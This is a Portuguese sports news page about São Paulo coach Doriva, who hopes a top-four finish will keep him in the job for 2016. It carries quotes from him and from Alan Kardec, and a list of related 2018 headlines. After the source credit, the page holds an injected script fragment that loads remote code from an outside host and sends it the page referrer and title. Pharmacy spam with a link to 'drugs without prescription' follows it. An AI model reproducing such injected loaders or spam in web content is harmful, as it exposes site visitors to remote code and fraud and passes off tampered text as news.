Destaque Noticia

Doriva se apega a G4 para provar que pode ficar em 2016

Além da importância para a tabela e o planejamento tricolor visando à temporada 2016, um triunfo diante do Sport, neste sábado, às 17h, no Morumbi, aliviaria a situação do técnico Doriva. Pressionado pelas saídas de Carlos Miguel Aidar e José Eduardo Chimello, nomes que o contrataram, o treinador vê na chance de levar o clube à competição talvez o único feito que assegure seu cargo no ano que vem.

“Por enquanto, me sinto totalmente prestigiado aqui dentro do clube. Estou à frente do projeto, focado e buscando os objetivos estabelecidos por nós. Vocês vão ver”, apostou o treinador, que já eve conversas com o novo presidente, Carlos Augusto de Barros e Silva, e o velho/novo gerente de futebol, Gustavo Vieira.

Ambos, por sinal, comentaram na imprensa que o cargo não está a perigo. Enquanto Leco considera Doriva um dos acertos da gestão Aidar, Gustavo fez questão de ir ao CCT da Barra Funda na quinta-feira, logo após a eliminação para o Santos. Lá, conversou por cerca de meia hora com o comandante são-paulino e deixou sorridente o campo onde os atletas treinavam.

“Todos os atletas, sem exceção, gostam do trabalho dele, da forma de lidar. Se for uma decisão da diretoria mantê-lo, será uma decisão acertada. Ainda mais no final do ano, pois estamos lutando pelo G4, que não era nosso objetivo inicial, mas acabou virando pelas circunstâncias”, comentou Alan Kardec, dando a visão do elenco sobre o caso.

Mesmo com o discurso, porém, alguns aspectos da reta final dão a entender que o clube já pensa em outro nome para ser seu técnico. Durante os últimos dias, por exemplo, a diretoria começou a conversar sobre possiveis contratações para o ano que vem. Nenhum dos papos, no entanto, contou com a presença de Doriva.

“Ainda não conversamos sobre planejamento, não sentamos para planjear 2016 até porque a gente tem visado ao ano de 2016 praticamente atrelado a buscar essa classificação à Libertadores”, revelou o treinador, confiante na sua continuidade em caso de vaga entre os quatro primeiros do Brasileiro.

Com 50 pontos conquistados, a equipe certamente dormirá no grupo dos líderes caso derrote o Leão, concorrente direto na vaga, com 49. No domingo, assistiria de camarote ao clássico entre outros dois times que almejam a vaga: Santos e Palmeiras, às 17h, na Vila Belmiro.

Gazeta Esportiva.nets.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; buy inexpensively drugs without prescription – http://azispurba.mhs.narotama.ac.id/2016/11/30/buy-inexpensively-drugs-without-prescription/ pills

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

Diego Aguirre: “O time não funcionou”

saopauloadmin22 de setembro de 2018

Liziero diz que versatilidade e fase do São Paulo ajudaram sua ascensão

saopauloadmin18 de setembro de 2018

“Everton saiu por precaução, não parece ser importante” diz Aguirre

saopauloadmin17 de setembro de 2018

‘Garantido’ na abertura da Copa América, São Paulo reformará Morumbi

saopauloadmin15 de setembro de 2018

Reforço para o Clássico San-São

saopauloadmin14 de setembro de 2018

Diego Souza revela papo de Aguirre com o grupo antes do gol

saopauloadmin9 de setembro de 2018

Diego Aguirre volta ao local do crime

saopauloadmin5 de setembro de 2018

Após descartar Europa, Tréllez vira herói e titular para quarta-feira

saopauloadmin3 de setembro de 2018

Em um mês, Bruno Peres joga em três posições e anima Aguirre

saopauloadmin29 de agosto de 2018